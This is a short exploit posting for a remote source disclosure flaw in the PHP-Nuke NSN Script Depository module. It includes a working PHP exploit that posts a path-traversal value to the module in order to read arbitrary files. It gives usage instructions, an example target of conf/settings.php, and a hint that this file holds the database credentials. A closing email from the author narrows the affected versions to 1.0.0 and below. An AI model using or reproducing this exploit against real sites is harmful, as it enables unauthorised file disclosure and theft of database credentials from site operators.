PHP-Nuke NSN Script Depository module versions 1.0.0 and below suffer from a remote source disclosure vulnerability.
144e75cbe059096e21d1f91bec2591c86ff0521111f4e18723c060b1380f5898
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
Exploit
<?
/*
Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file]
Example: 31337.php?targ=http://victim.com/phpnuke&file=conf/settings.php
*/
$targ = $_GET['targ'];
$file = $_GET['file'];
echo '
<form action="$targ/modules.php?name=Script_Depository" method="post">
<input name="show_file" value="/../../$file" type="hidden">
<input value="show_file" name="op" type="hidden">
<input type="submit" value="Show Source">
</form>';
?>
Trick
In conf/settings.php there are the database credentials ;)
---------------------------------------------------------------
From: kingoftheworld92@fastwebnet.it
Subject: Re: PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure
sorry, i've made a mistake! only the versions <= 1.0.0 are veulnerable!